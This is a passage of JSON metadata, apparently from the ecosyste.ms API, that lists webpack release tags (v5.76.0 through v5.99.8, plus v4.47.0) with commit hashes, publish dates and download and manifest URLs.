d_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"